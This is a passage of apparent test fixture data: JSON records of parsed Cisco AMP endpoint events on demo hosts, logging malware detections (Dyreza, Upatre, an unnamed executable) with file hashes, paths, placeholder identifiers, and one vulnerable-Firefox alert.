"cisco.amp.detection_id": "6533670191031648309", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 947000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670191031648000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 40618, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:22:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", - 
"cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 0, - "event.action": "Executed malware", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 15212386047828, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:22:29.000Z", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "file:///C%3A/ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "input.type": "log", - "log.offset": 44582, - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:22:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669929038643250", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 973000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 
6533669929038643000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 45938, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:21:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669671340605487", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 333000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669671340605000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": 
"b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 49902, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:20:59.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669667045638188", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 779000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669667045638000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - 
"file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 53873, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:20:00.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "f5:8f:96:c3:53:1c" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 1107296279, - "cisco.amp.file.disposition": "Clean", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.cve": [ - "CVE-2015-7204" - ], - "cisco.amp.related.mac": [ - "f5:8f:96:c3:53:1c" - ], - "cisco.amp.timestamp_nanoseconds": 0, - "cisco.amp.vulnerabilities": [ - { - "cve": "CVE-2015-7204", - "name": "Mozilla Firefox", - "score": "6.8", - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204", - "version": "41.0" - } - ], - "event.action": "Vulnerable Application Detected", - "event.category": [ - "file" - ], - "event.dataset": "cisco.amp", - "event.id": 15210587194928, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 1, - "event.start": "2021-01-15T10:20:00.000Z", - "file.hash.sha256": 
"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f", - "file.name": "firefox.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Exploit_Prevention", - "host.name": "Demo_AMP_Exploit_Prevention", - "input.type": "log", - "log.offset": 55192, - "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", - "related.hash": [ - "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" - ], - "related.hosts": [ - "Demo_AMP_Exploit_Prevention" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:19:59.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669409347600427", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 257000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669409347600000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - 
"host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 56650, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:19:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669405052633129", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 847000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669405052633000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 59295, - "related.hash": [ - 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669147354595368", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 375000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669147354595000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 60614, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:57.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533669143059628070", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 968000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533669143059628000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 63259, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - 
"user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:25.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259286289612895", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 669000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259286289613000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 64578, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:13.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - 
"cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259234750005342", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 657000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259234750005000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 65897, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:18:01.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - 
"cisco.amp.detection_id": "6176259183210397789", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 645000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259183210398000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 67216, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "e1:e5:94:ea:a5:44" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6180335966167760897", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - 
"e1:e5:94:ea:a5:44" - ], - "cisco.amp.timestamp_nanoseconds": 875000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6180335966167761000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b2e15a06b0cca8a926c94f8a8eae3d88", - "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", - "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", - "file.name": "Fax.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Upatre", - "host.name": "Demo_Upatre", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 68535, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", - "b2e15a06b0cca8a926c94f8a8eae3d88", - "f9b02ad8d25157eebdb284631ff646316dc606d5" - ], - "related.hosts": [ - "Demo_Upatre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:57.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668885361590309", - 
"cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 672000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668885361590000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 70133, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:50.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259135965757532", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - 
